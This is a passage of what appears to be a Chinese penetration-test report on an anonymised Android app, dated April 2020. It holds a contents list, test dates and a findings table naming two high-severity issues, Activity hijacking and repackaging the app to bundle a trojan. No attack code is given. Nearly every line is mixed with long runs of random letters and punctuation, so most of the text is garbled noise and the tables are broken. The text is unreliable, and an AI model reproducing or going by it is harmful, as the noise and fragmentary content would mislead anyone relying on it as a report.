% `" y- a# o: A* T+ D. j* N" G1 i& [+ q$ d+ D; {
: u8 r) S x+ ]/ Z4 h2 ?" v0 w5 D) Q! H3 o3 O
( O' w# B" c6 j4 B1 K
( W3 M( q( O& _; f" }0 |
& s! t! o5 c( N, c- Z8 H: ~2 _3 q0 t0 D; | O: Z& l
0 z) L8 L2 z; i W5 i6 [: G7 A, L5 G' g4 Z9 z
M% E( m, Y4 ?' e; n- G, @0 v5 p
( Z1 ?7 Z9 p) L/ \ 文档编号: ' V" p* Z e* @6 c% S( C8 m
, {/ A5 B G" N* D4 {
Q1 j$ Z* I$ }: ?- R* d% t3 X8 X2 y
F7 U6 N; H# H" A0 y! p
! a+ H# M2 z4 Y t3 \7 M
3 O1 {* E. T7 A4 w$ j7 Y, M1 o& q' t
+ Y" k- g$ Y6 r$ V; t
9 K" k1 W* c2 a0 f3 F4 t
% K8 P: ]- N; e% `0 Y* n* J
! E! n% W9 P9 w, T+ J& t& v 8 X- }; l; Q( y; l% h, X# V
9 Y4 m+ W& G1 k) D) _ N# R
- C- f) c$ Z" n7 t' j
, r1 [$ N8 l8 g( e, I& F $ S2 z8 P3 |) t2 ]# y! H+ p; ^
2 d/ d% E( r& |; t
/ b% d/ w0 W/ m7 x9 e5 d8 c+ C$ }1 G9 v |; k6 B
+ @) [& G* {/ {% |8 i; Q' Z: e' T/ h! e
1 i/ x* q1 D& |, Q* J " D! C8 N U5 i7 w: n
) [! T' a/ G9 T4 m9 @7 ] ; L/ p! [- p4 y
* j5 k7 y0 e0 y1 ]
( m: w0 l! G3 @5 r
1 T) G2 S, {5 F" k: @0 V$ M
^, C, P- _3 j) u7 [% M) m" \4 A5 f9 z, v# N8 R
$ L8 J1 c, p9 ?& G0 ~: I$ _
8 C: v9 ^0 g4 |0 n7 K9 n+ T8 I* V
3 v% G' i9 E( d+ U' M
9 d, T L4 m* u0 |6 P4 W
2 ?% ~- O. F! \* U: h; F" A; Z
, v8 {! n4 v# z4 ^' f B 某某某APP渗透测试
* J. q' ~) O3 Q) u; [# b. C
4 H1 t% V8 T: O
* C* j% h; T% X( w2 B- \1 P+ ~" m; d3 x, |
' \( h' S$ r7 h
! O, j# X# V; s6 C5 z' [, X
0 F: o% Q$ C: R: B1 q; I& N: O& Q4 b% c( v7 S
: l5 K, p Z$ l7 p
7 ^- m5 k8 B6 `
) g' o& {' i8 A7 a& i. y' E1 \" E
6 X- p: h- N; P; W; L
0 H( r, d; k3 v' o# I& k- p
6 ]. [, q9 s. t2 V$ N& m. M
( q, ~3 _* W v4 t, ` r
# F" n9 r5 ~. A
1 X Z" R& z2 e- K9 E) X: v5 o & e9 w2 D" T; N) G5 t! y
% t( C% A: J: S) h5 A7 K+ y
: M7 T% K- Y4 `. G3 W
. C% @, E4 ?! D" S # c! h( Z0 N+ s6 s1 o. b/ ]
& {' Z+ E" x( o' |
6 d; |) K& p" z7 x9 U, G+ ^! Q1 f
a$ v- w+ q& P3 ~: b4 w1 f6 A) @
6 A2 h4 _+ v, l# X
/ B5 T% ]# L7 I# I
8 a8 e7 {+ o. R) s! m0 W# } 技 术 报 告 ( V3 U& o4 p( o9 l6 r: z5 x
$ Y0 e8 h: R$ r6 K! w2 U) k
* u1 `5 U" |; X/ M8 r. K
{& K; G7 h2 s8 B A9 J8 A
; A8 ^) D4 ]' n- Q' [% d1 @* w) S: b! F& E/ Z. [& Y
0 q! I' ~' U! Z- g( c$ W6 d
% K; n( t& @8 i" y! V" E
+ H1 a7 _+ M: c, z3 L6 r0 F/ j$ Z
; l& w4 }' `) c9 `
9 H$ V, X; w5 k! I, ?* F: U1 `$ n* x2 C9 t$ u$ G; R! I
: S" s3 T& V! ?; d4 J: I Z* W
3 y9 _' ^+ r1 z; ] W! }( e
+ e1 [* ~; U/ \ j2 u- g I) M
" u# \1 X, G4 G9 ]% L3 @
- Q2 _( W5 a W. W5 j I& z3 U3 n
/ a& p+ v! ^/ C' G" x$ m+ A
% p# ], C2 \2 t) r& A
4 _9 Q- ^, Y2 U: g: c5 Q2 x0 a2 g
: `* R# k/ B+ A3 g! G, w9 x1 L
. s: ~- R$ }3 b2 J ' y6 X# M R9 V2 v# S/ E
+ m! S; L* t1 ~* c7 Y C7 V
; [) k+ s# R* N% l& s" S
; a$ E* P$ _; A3 w& m9 ^
* V' m3 y, Q' t1 d/ V
/ Z" l D* o% | / \* w$ \6 r/ `* a
) e# _! m; U" l8 F5 v0 u& \. b( g2 K
! c4 d# ]1 {1 P, [; o$ R3 T2 {
; {5 Q+ ~2 l" g7 g) ^8 y: h1 o
@: k" W* j5 B) V
" G; E# r: F+ Z3 k- F6 ]0 Q
7 [ U- ]1 n; q( {. T% c
+ w3 ^9 _* |0 P; _- {8 ~
2 M6 [7 o4 c/ S% Q' a: d+ ^8 T( x4 f+ d( K1 [( c, V! K: B
# f! F) u4 ], z H2 k, u9 T
; [3 I! w0 u: l% _& h
. z2 {, b/ M% T- k) J0 l" H1 u) z d: e7 N
9 g1 E0 r% {' \: [/ {4 E( K' i9 s# f
% j7 Q3 M0 c0 U K( U. R ?
# Z' `) q! g3 f: ?# ~: B. Y% v , B7 u1 S0 @6 f+ f9 B( _3 T
: g0 d9 d( n1 b: Z2 t
- g( D$ E2 |" W! e6 B- X+ |# b) }3 r5 `' ^0 E4 O; n
3 i6 {9 H+ C" ?$ }) i' H
8 J' H' R* ~" j- H* E$ f% W- O ; N' l7 E5 K( Y8 W
4 C+ E: H0 M* e3 _; e
- ?0 r) x8 i! D! G* n
) S5 B0 R D- J1 N' q
( K5 ^; A8 D/ I5 K B' E
' n/ Z3 y1 B3 m
9 z% l8 m, g: r r
; i- p0 I* G0 ]% E! r( ?: \
0 n- Z; Y2 k y ?7 b- \
- {3 I8 {$ ]' S9 Y5 u* ]
" \7 G3 ~2 ?! S r L- |
3 e: s! f" X" N8 ~7 x$ X
6 O# O* e* I% J# h- ]7 g1 F+ R( t* Y9 ^2 I" i G% Q, C
( X& D( E7 f% r2 \, i! S
' f2 i" G0 J+ I1 g8 v* {2 l
9 |3 H+ m7 M& X* [+ w
+ p; D) ]; o& t+ e X
* A0 n4 j7 v2 s$ N5 T- ^: Z2 ]( X* ]! F7 H$ V
3 z0 x9 `# V, e( M% T' E1 @
; ~/ Y0 H- e; {9 V' m$ {) O! s/ o
: L: I5 v" P! W0 I- w- q2 k3 R) @
G1 E, h% y8 Q% M/ Z- z
% n( n0 z# f$ Y1 k3 T6 C: ^1 x4 b1 @# q' z0 u
( X& q3 i4 @' i/ H, Y
4 `; V; n# `6 |$ E
+ b+ H+ \. H* T- R1 g
7 |6 z, {' {0 \4 W5 ^
* m) N& ?) k1 |) c& Q6 }: G
$ F9 a8 z/ R# z) \: q$ t4 a: z- ]: y* Q6 `
4 N$ \; W) G& L8 d7 E4 j; ?
4 {0 ^( w6 F0 B P! U5 T
. x* b. n* c8 F. V: X, s
/ s# D) E6 f0 u7 a9 D
9 ?2 ^7 _: M7 m0 D! y1 B3 t
/ s) Y; X8 \' c" e6 e, P+ u/ g1 M
, C! W3 m1 d$ h) M5 ?
1 _9 `+ C* E% i/ u6 [; d
6 V3 ~7 h& W+ W/ Z/ F$ _1 S- y4 |
9 e. Q- v# t* |5 n
9 F$ o/ m+ U+ Z- t
3 ^$ f7 i% r+ V. O+ _( K + T! T8 N: y, [
+ O; C# H0 e ^
2 e# _# F# M y0 o
4 ]4 s' Q5 _# {0 ?# f9 ` ' q- h0 j. M9 j' N6 M# D% L
3 W; D2 r! K- U* i/ P, S! O! t
& |- o, Q0 [! R7 e# W9 n! V& U4 |; y& {" Y% O! A- Z
4 l! c0 b: F& W4 s X2 h( O
7 V/ T, D# Q' h/ r, N6 ]1 q: H: J' B# Y 5 Y/ n, S- p" _: O( X
+ [! b7 p$ Z" C- F
- y2 `3 g) w! r& B: f$ j% |; O5 e* ~( N. X# p6 B3 O4 M
& c: D6 Z+ N0 C1 Q( S
1 L4 m# h# J/ e
- R2 y& y. D( Z% q9 K! i6 C" m* `" ]) B9 z* P' n3 P
二〇二〇年 & f1 K1 I1 k- Q3 D
' C* A1 U3 p0 Q3 Z
! A9 i" I3 M* l
& _) C8 d# r, k0 M) K9 a+ {+ E
8 ^" v+ N5 U/ D# x3 c1 {: C9 V y6 r
1 H( @7 S" \' A$ l9 K! O0 m
6 ]( O( p8 i- O) o9 F, t 0 Q' V' j3 |+ J. b: }
0 P- w4 Z3 q) S' p 7 \% ?" _; C, v9 a, S
6 W0 \6 h& {4 R6 c* x2 V
! f1 |( D) U0 e5 C# d8 A
: c$ H& \$ U( H0 R1 d U
$ |8 j) m* M) Z" j
7 j+ d O0 C8 F! Y# |. ~2 m2 j
. D9 Q' e: k+ \( h
# n* ~$ F6 M+ ]8 K+ R 6 @/ A8 y% i! P- N; L
+ J0 G7 H7 t! T3 e2 G. `0 \
, I8 f) }, M* @( r$ \1 a
$ S: S3 l" Y0 q/ o
目 录
; A: h5 _; ~# T" _5 u( A N6 K2 U/ T7 X' V, |' Y( _9 L6 k# T- T0 n5 e
; }9 o# c+ J: o0 F: U9 m7 M5 Y# ?. x( U1 |. _3 Y H' [
1 s! r( H: _5 j
( Q9 l& J+ Y* x$ j8 x* Q
" m; Z; G9 \% u2 ~5 D
, l7 `! U5 o* Z. W& D8 y8 L' B9 L8 i+ C
$ {3 L& W; s: F' {+ d0 M$ i
/ ~% t( L5 U. t2 k8 ]- N
: \2 Z% {! L9 i0 B+ }7 \% o' k2 g% k1 Q D
7 O& C* O" V" ^) k8 f* ~( h% C: s0 Z9 V# z% G* P m/ O
1 概述... 3
4 K3 e: j- i! k9 b& Z X+ O* A9 ^8 _
; h3 ]+ O- P# c% s4 x: C, q( h7 }3 \
& \5 L& b5 A& b# ^. P# n0 K% d" J
$ T$ }0 y' l! s7 k# r8 E! Y( b: v& y0 H) q9 h' P" _& {2 H9 r
1.2测试时间... 3
1 p9 X% {2 W8 }9 a5 l' S- {$ J4 d- B' R- M, |! h7 Y# O1 ~5 t- J
% `2 w R8 l2 _, v5 j2 O$ t0 {) ?
+ w2 R) _1 J. e) Z2 U" t9 e7 G
$ i, i4 T. u' ~/ F( G/ K/ N! q
4 P! R3 n6 S( } 1.3测试对象... 3 2 v# Q9 r _0 j2 ^0 _* m; S
% J5 b3 p' d9 i5 W! J: s
/ [# l1 f+ r4 q; R/ X
" N% G+ C3 m, \* [ L % [3 Z5 n6 Y+ d# M+ g7 X# m
+ D1 n! F0 Y: E9 o, p1 L5 A5 w
1.4测试结果... 3 4 ~( @) i z/ G5 F
0 a0 T8 e) C+ W5 [% R6 _" I t& [; L
5 e! C5 n9 h6 a+ W
7 F- e/ H% @' |2 k( Q" U/ l% @; R
. d3 \0 D1 P" ^
+ ]% g' O- n6 s/ Q+ y3 D7 G 2 检测结果... 4 " _3 M6 P% z# J7 J; W( R8 g
( d7 L9 o# d0 y- T' P' |
8 j2 [0 J a2 J# H# h
/ J; G, w! v1 X2 X7 X+ I. d
0 |; l' \ Q5 o* o
# N5 f: y: E4 ^% @6 ] 2.1 某某某... 4 ) x+ R: X3 J0 T# U# e( q
! _) j/ L: E1 T+ J3 a. `* h
# A) C/ G# U: A: Z& s% T: P; q
: ~3 p& x. Z% _0 W9 p
) f+ g* D' ^) M3 Y% ~& ?
+ l4 l" a0 x& G0 a/ q 2.1.1检测目标... 4
) O% k8 t4 s9 K/ O
5 @( m2 G2 b y, C! V0 Q
' Y& S+ O3 V; {8 Y8 C
. N% h" w. w: A, b7 A0 v& u
* {( c% T1 v1 L
1 i9 E. {' J% L1 z7 J6 @( V 2.1.2检测结果... 4 ! H; Z8 g( v6 z1 G% [
& ~9 h3 D5 J+ B9 A7 E
6 @4 v+ E* U3 g. p+ ~9 q7 X
8 @' C2 q% t/ {8 h6 f8 @ , N$ [9 ?# T; T3 s$ i
- Z4 M4 Q' o: O. B
2.1.2.1. 4 * b/ c2 _8 x( B/ j0 N
/ Q0 d6 C6 M4 x; g. u. V
" n: g0 K9 s$ ?, d' s! V) k
, C/ t* C5 b# v5 @. J# ^
- x# v: J' L% E1 n! O) ?, |& x0 T# L* ]3 C5 [3 O
2.1.2.2. 6
9 i2 N/ D. q7 Y! B8 ]8 n
2 R6 R0 V- J5 n* \- b1 ^4 o
5 J& W* e4 Y j* H- U0 [
$ x2 b* j) L* S' c) m; V0 O$ O
* R& q; r" w8 P" P" ]
0 b+ ^) o) C+ C( [
/ C, Q O) P2 \+ N: B1 I) C0 z
. e5 w# N- t6 B/ |
- P: B$ c* ?6 h$ A9 M" n3 C
6 i* Y( x: ~ f$ N: B$ g
; o! b$ b% \/ R! _( R5 i% B5 }% y& n2 }" B
{( E1 o0 \0 F/ J; G! z( N& F* ~- x- i0 m1 T( D' J
' d% n3 g9 w5 b7 W
9 x) H: Y6 k, _* M0 U/ B3 ?, ?
# P; V( y5 i. `0 L. k
# a: B. ^% r/ [4 E W ) N1 V2 A6 T/ {6 t7 L8 l
1 B* ~* B( I, j/ E0 }/ q3 V' e, _
1 概述 9 K X5 K, q. `9 o/ Q) i+ C- `4 _
+ I# V! e9 t3 B8 K) k8 G( H! y- b2 C
) A0 Z2 C5 @: r3 F* i' p0 H* d% k
4 J' w i6 ~6 f, E; A$ g
) F4 q' e$ Z" @( z; m/ @8 ~
- l1 J# [! M0 v4 y; Y4 j/ y 1.2测试时间
5 M8 a# K# m3 x! `* ]9 i: I
3 t& R) p7 ~ w/ s
6 J9 P* n/ M% ^
5 n7 q9 p! ? `3 ?# g9 B
( d) g/ |" K2 i9 M7 X5 I! F
+ j+ B3 `# o# @8 O
" Q% Z6 g% k5 n1 P: E6 ^0 m7 v
! l+ ^( c6 H i. H9 @! l) } & R" ~9 ~ w5 ?
1 k6 C& Y8 A: h1 W |
- D8 _ E1 g! @3 U6 \) t7 I; }( h6 y: F; i8 o- T& X9 E p( p* |
$ U8 v& N7 ]4 r5 W& Y4 \) z+ K- L b K7 ^% P6 U; A; r7 Y* ~
渗透测试时间
* k. c$ ? V9 Y" Z2 @7 @
) N( l+ ~3 w' e/ c: T
. m$ I+ J8 F9 I. o" E m" a7 E; B6 Q
|
. h1 u: }8 i0 V# ~; k8 f( D
% |5 X! [, R/ V1 n' t b: s: Z, [# b
" l$ Q! S% M! P! d: x6 A- R, G \* M0 E/ d8 h' P
0 t! P( {2 c6 j% l7 i6 {
4 A. e4 e0 q) t! i6 H5 z2 h* E, K# c
| ' X P) R$ I. z& S! L
3 ], w. F# z( Z6 K4 h9 Q: V/ ~' V : `) `/ P9 b" E; M7 h+ f: C. m0 F
% I4 }$ Z7 O/ b
起始时间
# ^5 q+ W% D. E( K
4 ^" k4 `2 p- v1 q0 k 8 m+ c- M2 }0 a, g4 n6 G/ y l) h
c5 V; ~7 ^; C2 q |
3 z% @" m3 p) J% w
# C" ]$ J$ ~ q8 c7 J 9 b a& {9 E" O" i' y
* B- ^- N% A0 a+ i, Y
$ d1 `+ r$ ]) S8 y6 V) k! J2 i: `3 `' @
2020年4月6日 # U/ m3 n4 Z$ M6 ]
) y9 S7 ]: Y/ X
* R- l: Z4 U) y9 n: p7 W( t5 z7 Q- P9 O, k* Y1 c( z8 ?
| $ P+ S! d1 M; {2 s
5 D0 q: p5 F$ c6 n
" H4 p3 s; p! N0 J# F
: L4 Z) H+ ^: p' Z
& P# o, H3 f$ w d5 J6 D9 A7 W V: {! {' Z ^ d; E
| & ?& n' F2 k! x
% [% ]; `: G! _, a# c" n1 R 6 t, {" {( ~8 @1 k# d
' o- N. M5 @* y d' f3 T! D 结束时间
' C+ o* ^4 O( c& i8 d2 U8 S: R; b+ `% s( l/ |1 C ?
& T( Z" t% X2 V! F X
, W& [. J$ v# ?3 e. L | 4 h9 ?: n7 p: g* L7 H
p: \/ b7 {0 M. a- v+ A
( a9 q& `0 }$ j5 T% J5 o2 X" D6 L J2 T/ P0 [
1 l' q0 b2 C/ w1 A; B
8 u' ~' O! L# c9 J$ |4 h 2020年4月9日 7 `9 ]' G8 A+ ]6 S
# W7 [) g1 c2 A2 B( C# I6 D
& A# _ i) [% h6 g5 ^5 r. `- e& s4 x3 s0 f$ b0 u9 @
| ) b# L5 Z( A' h, L. x% c
" q( I2 r0 j! E# N# a( Q
& j! d3 [" I! [4 I3 ?7 v
9 p8 z, F) v4 ]; \, O
8 A# m4 G* I2 N) H( t! W+ n, [7 f0 q: g" ~* y+ T! e* a
: ]" Y4 R6 \( Q7 b/ B+ f( x
( \2 N( e% L% x+ A: r( |- K
4 R( t4 H. Y4 t! F# g! r, u7 }2 _9 P! H) [+ M
1.3测试对象 0 [+ l8 l. z. m( Q
3 ~) r( {9 [; u6 @& K* h
; X; a8 y) I* E9 r; z
* C, I6 L1 c( k" y# j# x% [1 i
3 D, [$ a/ X* d8 y& u: m
$ A' A7 M6 S( p+ P 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
% c/ l6 G$ V) k9 M5 F2 L ^3 v9 ]3 J8 m; \5 p
) ~8 p5 o- L: o. }0 {, Y* G( y* E
7 { E5 R9 T% C4 d0 D0 R
& m, Q9 P6 K7 t' F/ h% r# R
/ d( I' [* A5 |! j2 H: l 表1-1 检测对象
2 [ o% E5 l. s/ f& S v/ X& |- s6 {
$ V3 F9 I. g3 U2 ]; v0 h% O
% P# l( c' f8 \8 N5 Q3 Q: P2 a9 H 9 C9 m2 w7 P8 A7 b8 V7 q% o) g, v
% E' {( @9 L. n+ Z( F0 Z: j1 n
1 Y4 E$ _5 U8 W& p% t( H" n
# m7 ?% T& |( H# h5 ]4 Z5 V( N
, h( K9 T7 z* W, Z, @- S+ W3 ~+ h. S& q! d
|
7 O( W3 b$ R) G: ]
( p# V5 c- F& B! _6 ?
' e. n, i/ @$ c. }2 F, v& m) e3 k1 ]2 I8 C/ {8 V1 J8 ^
序号
" h+ C& w; s) s* d3 a! _$ q+ a7 X! v# W
8 p( K# D. c& A% f7 M7 t- b7 k5 v& u" {5 X3 h
|
; }+ Y" F1 N# h, S, l& V6 f1 G6 _% s* J3 I* J+ Z
) p& l9 b0 I) y' W5 _) r
4 q: c: N9 i4 \1 |' j/ K; b. ~# ^$ H
# R% p' @3 T4 T1 P+ l$ U* g
- x. {$ L" E5 J6 Q% J- ~ 测试对象 . H* J- u n# C
. E% \" F6 b$ n1 F( X( e3 E
$ K4 ?0 s( K' L1 y0 V
! Y: G0 L' f& T9 ] | $ ?5 t0 ]' N- z: q
7 M; L; x9 ] P A& q: C6 t
/ F, z' R: P. G4 u
0 m1 O9 W m1 k0 N
8 ~ U4 H: u! m6 u+ d$ | M0 j% |8 P2 P/ ~" E
测试地址 # e1 }4 A/ T9 A/ g$ E8 l
2 q, S% F$ E. d; x, S% r z& {7 t0 o* O* g
c$ I# e# s) k# f% i3 n
| ?, o- o1 \6 A4 B
# ~: p i, g6 T- Y9 c* G1 P
: }6 y; P: S8 r6 G
/ M# t1 @+ s# T3 |0 K+ X! x9 n 0 F: b( o; k- D$ b8 Z5 d
+ m$ A5 j7 ^7 J: p# M( Q 安全漏洞
( L! {) Q5 B" Y# c, Y3 J5 p9 W: g- |3 M5 }! T- c! o& Z0 B; p- ~
' T3 b x+ `. P& s7 c/ y; X
8 d7 N, a: F/ r8 B4 H |
2 W! z0 P5 `: M% t: A! P% i( `4 W
& \* x6 Q2 J# k8 O0 y
% M, M5 ^. s- |5 Q! D* ?
" E. y. K- c- F# Q \3 ]
, v# ^" a' v6 M( E
6 G3 r0 y+ }5 E6 T+ G9 o3 _! x
| & h5 r% ^: ]+ K# _+ `: ?
' m7 x, F) T; `0 v7 e( v* o" P
5 u; I/ `$ k4 h# m( d6 D) d$ G6 |8 z* c8 d! x+ O- \
1 ; l" o3 B' F8 t2 m* a4 e
! j; d; U9 D+ m( \# q
5 C3 {, l2 G7 ?! A7 u3 Q- v4 H8 N+ X) |$ Z1 W
|
! e7 g. q7 \9 _) E
' X* Q0 v# g. c$ W! R5 ]4 M- ]* |9 v 4 c% m4 |; F' m6 G8 g `2 }
) s5 k; {. V6 m. F0 T
0 i1 T$ {9 C5 ^, f. ?6 E7 s# j* T# e v. A
某某某安卓APP 9 Z f2 d' D( T+ C! I1 p
& d4 z, W7 D8 S( A, B6 I
1 u6 j* B& {- I& l" e' }) C
0 Z. O/ z0 j% n( [- Y
|
7 l2 @7 O7 Y/ l6 J2 r# b8 m% B: T7 J7 V5 X: |4 x
# A+ |" p1 t- P2 [" q8 S' c
* K# C# ^0 P* I* ~
) S% j+ a9 B4 s5 u1 g& f$ [
4 g- G8 G3 F s2 ^ ( E. e% B" _2 d( D
j p( w6 c' f4 b/ W1 a1 D
* f- x1 l1 f! G$ {* n) P2 j
3 z) y2 k! k! \# ?, q0 a
| " f% M! [* |6 ?1 v, Y0 B
9 c% y2 x6 f0 X/ Y$ p' z
! v8 M# X# p6 D
1 a, P. q5 i. ?9 I& J, b6 ~
- r9 t5 q9 d& _ B9 _; l6 D8 k9 ^; v. d" w- K- I7 \6 q: C
2 & z4 t) F1 n. q. U% ]
8 t, w' K* P: b3 d" z7 x+ M. L; Q
, C' I/ ~+ P; i# F' x2 t5 @/ G' ]& N8 O. }
| ) O' [4 @4 o) n N9 U$ u
3 u) w0 W0 M" T4 ?. Z( F
1 N6 ?1 l( ~) `& p* h I+ M! C3 J) Q. Z5 O" S; |7 B
. M# V z% U9 r0 B
5 M& }' {0 t0 F. @% y5 ^
; {4 [9 l; x, L. T8 @/ y
i& ^: M K1 J- C* X: `# o& m+ ` $ }- N' _; I% z* K5 k9 m
, \' e1 }, Y# z. a6 b+ H
1.4测试结果 , I* g* F. n V( W, c7 ~7 {
( N9 o. y- T% w: _. c2 Z+ a
; N, y) C( D0 k5 N1 [
! ?7 O) o% x$ v% s N+ S4 L v# O8 ^
. e7 ~* Z! H; q4 I0 U8 F- I# Q* T
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # ]' @5 ~+ v4 ?8 `
% _( O' G1 g* M$ A
1 F) u0 z5 g) w. h
$ p# G0 V& ~% P! |+ s: @ + W/ K# {7 y+ B
0 ^* p, G7 G- d, f/ I0 M4 U
$ V6 e4 P; A3 ^7 @4 i4 B# \
: J- m$ u0 k; `9 Y1 s; v' H
" l' f5 K4 g" F7 v; M+ P+ h: H- a5 a' m; w7 K d
% B4 d7 D9 V; T
* M {- q8 ?$ Q: N! {$ A9 g* z8 e
: o6 N. {* V8 g. e
v! }: Y# R5 l
7 c' f: j D+ S/ r/ u& Q- g7 W/ y Q$ [' V1 F3 E% z
. m1 c2 ^+ u$ n; v) x; M" f
$ c% A' E+ m: H |
+ v( y* j. c& P, t x, d/ j }% y1 g$ M
; ]; \8 C8 F( b; G% u1 i9 ^ @1 M1 H7 k% }% L' Y) ~
序号 ! F7 A' ^- @$ M7 Y; r, \
) y% _* V5 _+ S; b 9 I8 o+ z7 W/ B( ^% _: l
3 A; M5 W, R+ n; Z' R5 m! L |
: N+ r3 `2 P9 U% g/ {- }+ j' q ~; _2 h* n
$ s/ J/ G5 X9 b
. Q4 _* S( P2 T1 o
$ }: n5 A5 H" w) m" l, w4 N' ]1 m, K/ \1 N% m
系统名称 2 k9 y m4 M1 Z c- W7 I" a
9 p4 U$ x4 T* E: V7 y/ {9 E ' V& J. X4 @8 z$ A& X- w4 m4 O/ D
5 v- w# F' {1 a
| . J+ @! W( H8 o `
( d4 a3 k! H/ z, v% I- \
; {( D" @9 w, [8 w) t: P1 \# u# k
7 J4 g2 K. Q. N: z5 ~
7 u4 U1 G. v2 J2 V
漏洞名称 9 a" g& R9 i N
+ K! n5 @% i6 Q" L& _
1 B+ g2 {8 p5 K- ^& p/ O
8 y3 {% a/ u3 m; I h |
0 F, H ~0 G6 `; x, V' w) h' ?- Y9 U* \1 b2 U
4 q& s4 g: }; ~
& J: {! `" d6 I6 d8 r* ~4 ]
% ^+ u5 d4 O& n4 Q' ?0 Z& | }9 F# F3 L7 o
漏洞危害 ) ?. Z; m" W2 d
! ^* i3 u# U% h7 O8 O7 g
. o+ Q! Z- e$ F/ \( Q
5 h/ E8 ?8 J h$ x% Y8 H% f |
0 V+ Y: i1 R& D# u! ^
. ]7 Z1 ]4 C8 \: z) j , s7 E* b, |, }0 l
6 p G7 C$ a, W3 d0 F9 {/ k8 I
# ~' P0 @/ @1 f% h% E! E# ]
* y% E* }7 r0 R* m
修复结果
( L) c/ B* N& ], p! e. l0 j- x4 l9 J/ S7 u# i
/ A2 C; |! q, @$ K
. L0 G% x3 t/ D. B' t1 M5 n& C* B
|
- G7 r) ^! q1 H* }4 j5 c: M+ I! Y' e1 u `: I
! D( z! D5 L& E. A; ^( b
, a, m& m- L/ L( B5 D7 X: p) P ( [# n# Z# T2 K5 z
4 y3 b, I0 r4 d |
^# C5 K8 v% j* F. Z0 H* j0 C0 I( ^, p7 [
2 A. Y/ x' O! X8 e
) v3 p8 q: c0 x& ~
1
# l+ ]- n3 h! u( z3 R% D3 C7 F9 N7 u8 y
1 ^$ ^7 S& T: Z; U I
% T: H% M# x8 S- `2 [; X | 9 g3 r3 O1 @$ K& `: o9 Q; q( X, p
+ Y8 u( h. \! |5 X N
& E/ J# e6 C! r* |. E5 w1 [9 {; m$ \* ^6 p1 Z1 M4 D) n% K+ {
3 n" M: o6 U" U3 H9 Z" B0 Y, l
9 m+ B( b" `& ~+ w# P- b* s
某某某某某某APP
2 R& S0 s" _0 T
: P' U. k7 [- {0 f/ H' K8 k
* f d: Z2 o/ C# w) _% R6 T g+ g& m C
| 4 R" W& G: w" X- V' o; I" q
& |7 c- d$ U/ y
1 J: \/ {0 M- o* Q) t q8 X+ F8 b
9 H p+ m4 L3 [1 w8 S* Q9 s " U6 r% N) f1 A. {1 ?3 t
0 k$ I4 X. j* d- q3 d Activity 劫持
/ @- }- Q! O8 E" b- _8 y- S$ h9 |* O" {5 C. e* c- F4 e( U
( g3 i! i8 N9 F" \5 R: ]( s6 R
7 F E4 X* S# _9 H. p4 q0 R
. b) b6 O d" D @
" O1 e8 _. U$ x! r' m: V
2 Y8 @( a6 `4 G4 y& ^* H) e' F5 i6 }# G/ K" d8 b. s$ ]
7 ~6 @- R0 h* f4 j" H, ]+ x& y4 {7 o
4 E) v3 o8 n% \ j
|
b7 I$ M9 [9 q$ w! R$ [; _
: l" ^% e: s. p, F* E! L+ n- k
5 o$ ^ U. ]8 x; o$ D
- ^5 N6 P: G" w7 }) A+ B
' X2 c- D- e: y' E) G. P8 O! i
! }/ ^& D# T2 k: u* B 高 4 m4 \$ Z& E, o
, }) p+ E: w6 R8 \4 A ( [2 K0 i o$ Q, Z1 j
: L% t* _: C8 h1 x0 H( x- f- u | : S! E6 B- _7 }; M4 T1 h
" ~- o* O m+ Y) i! B ) R" t+ u' F9 G& @2 p- g, x" [6 s
) E% `, i' M+ o+ C$ M
: t {; ^- O' z. D* c
$ ?; l; s7 S5 n7 L9 Y8 Z! | / p" `2 f, W- f: f4 g- |9 [
7 L2 F2 r5 e) |- u5 x* G' l" j. B & ~/ W, e! ?& y# w/ I: ~$ n
2 }7 V# k9 x# L/ S | $ ^. h% D7 S7 U! u# v% O
* f$ A6 l" t L4 \
: a9 f8 X J) C# U
( j% @& U# D+ A- |" z/ }6 M
) E" x/ o& f3 E, w3 h I! R, t: @( G( S2 w1 ^" T; F
| . d: H0 K* x$ m) u8 A& I
/ T# T, w% ^) h+ K5 {
! z: h9 A' q8 o; B( l3 s- V- g+ Q$ v. O- N' r; J2 k- o, w: H
2 0 ~: Y$ z: u, @0 s$ E
5 Q g6 w' w$ W- U7 e7 T
3 ]: S3 A$ n! o' n" O% i. p" l
6 A _* P+ O1 m: k5 B |
% Z X$ Z/ L" H( A3 ]' ^, e0 ~, k9 b4 p
7 m2 X2 Y3 y) q( L8 v; j
8 W0 [5 v4 R% F 3 A+ a" o" }7 N6 d ~5 B
) y! i& ~# b: M& Q/ A
某某某某某某APP
: f' S& }* f" r% c9 y2 T) |) @' V# _0 {% } ]2 C/ g
2 a6 c0 M1 b3 v$ Q# x" i% P/ q
) Z* R0 Y3 Q w: w5 r
|
" C. b* {6 M8 g+ K* g' W
5 ~8 ^& h) `0 Z, h
! x) \: u; k; ]) V" o, d
3 b9 d6 i) |4 b- F. R1 J _ r5 W3 Z/ D' z
: g ~0 E, I" K. |/ w! U; z/ r) j
反编译二次打包捆绑木马、篡改APP代码 & l" S8 v4 l9 q; s
# a6 b& T d! S: q Z& W
7 s6 y/ V& D8 [
; w2 N& z: Y1 Q: O |
: i2 }2 m: l8 v8 p f# K
6 x1 K) T$ B8 s! }0 |7 d% T 6 Y, i9 N3 {2 X' b" S: ^
) i s7 e, T0 ^ `; s
3 J9 d: l) F" `& A/ }7 p
& b. |5 x7 y6 N7 Z. U; F
高
' B; ~' l5 c8 a1 \1 ~! G7 V9 `7 Y, \& o% V6 k+ k
# C4 q2 _! |' g. d: ? d K# V* \9 J: y; [# h2 F$ T
| * g' L" Q: b7 n1 r7 C: ]
" h$ u9 l$ P& r$ [0 H
9 u4 Q; c: i! C
5 ]! w, U. b( N6 L* ?; `. M
0 @$ x9 s8 F$ q" V# [
( }: |: u$ c" g% u) u' u
- w9 b0 \ h* s" t. ]
. q) H7 J8 f3 h: T
( J$ a% |' h& U0 }. T1 u0 O4 g# h6 J2 n- y
|
# R! D6 v2 P2 Q4 Q R
+ L% p) O5 [, z9 P4 ~/ p( Y
9 u/ o8 X& E5 S* u: E0 b
+ p5 u6 q `; V7 J' D. \
! G4 `/ R+ F% [
: M' z/ ]3 O; u. \- B" Z
/ x: u* t7 w# N9 s2 h% o
) P9 V5 Y( e, {6 x) b ]" z
! n$ W. U+ } T8 `
9 Q8 h" L6 [ o% U9 _" O6 ` 2 y5 ~ a/ u5 @
